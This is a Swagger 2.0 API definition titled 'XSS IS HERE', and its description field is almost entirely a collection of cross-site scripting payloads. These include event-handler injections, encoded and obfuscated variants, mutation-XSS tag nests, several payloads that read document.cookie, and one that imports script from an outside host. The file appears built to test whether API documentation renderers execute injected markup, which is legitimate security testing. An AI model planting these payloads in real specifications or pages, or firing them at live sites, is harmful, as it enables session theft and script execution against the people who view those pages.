swagger: '2.0'
info:
  version: 1.0.0
  title: XSS IS HERE
  description: '<div class="login-form">
test<img src=a onerror​=window['alert'](window['document']['cookie']);>test
<img onfocus=alert(1) autofocus tabindex=1>	
<p onfocus=alert(1) autofocus tabindex=1>	
<form onfocus=alert(1) autofocus tabindex=1>	
<svg onfocus=alert(1) autofocus tabindex=1>	
<style>*{background:url(javascript:alert(1))}</style>
<wbr onfocus=alert(1) autofocus tabindex=1>	
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022<​script>alert("ibro")<​/script>\u0022\u003e
<hgroup onfocus=alert(1) autofocus tabindex=1>	
<input onmouseover=alert(1)>
<ul onfocus=alert(1) autofocus tabindex=1>	
<video onfocus=alert(1) autofocus tabindex=1>	
<svg onload​=alert&#0000000040document.cookie)>
<details/open/ontoggle​=confirm('XSS')>
;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)-->
<svg onload​='new Function*["Y000!"].find(al\u0065rt)*'>
"><body/oNpagEshoW​=(prompt)()>
"><body/oNpagEshoW​=(prompt)(document.domain)>
"><script>alert('ibrahimxss')</script>
%2522%253e%253cscript%253ealert%2528%2527BUG XSS By Wildan!%2527%2529%253c%252fscript%253e
"><input/onfocus​=(confirm)(document.domain)>
"><body/oNpagEshoW​=(confirm)(document.domain)>
"><body/onfocus​=(confirm)(document.domain)>
"><svg/onload=prompt(2)>"<input onfocus="alert(1337)"autofocus>
"><Body/oNpagEshoW​=(prompt)(1)>
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
img src='#' onerror='alert(1)'>">
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E 
<mark onfocus=alert(1) autofocus tabindex=1>	
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">	
<plaintext onfocus=alert(1) autofocus tabindex=1>	
<video controls src=1 onfocus=alert(1) autofocus>	
xss0r\"-alert(1)}//
<video src="#" controls onwebkitplaybacktargetavailabilitychanged="alert(1)"></video> 
<svg><image href=1 onerror=alert(1)>	
&𝐥𝐭;𝐢𝐦𝐠<> 𝐬𝐑𝐂=𝐱 𝐎𝐧𝐄<>𝐫𝐫𝐎𝐫=𝐚𝐥<>𝐞𝐫𝐭(1)> 
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<audio src/onerror=alert(1)>	
<ol onfocus=alert(1) autofocus tabindex=1>	
<image2 onfocus=alert(1) autofocus tabindex=1>	
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
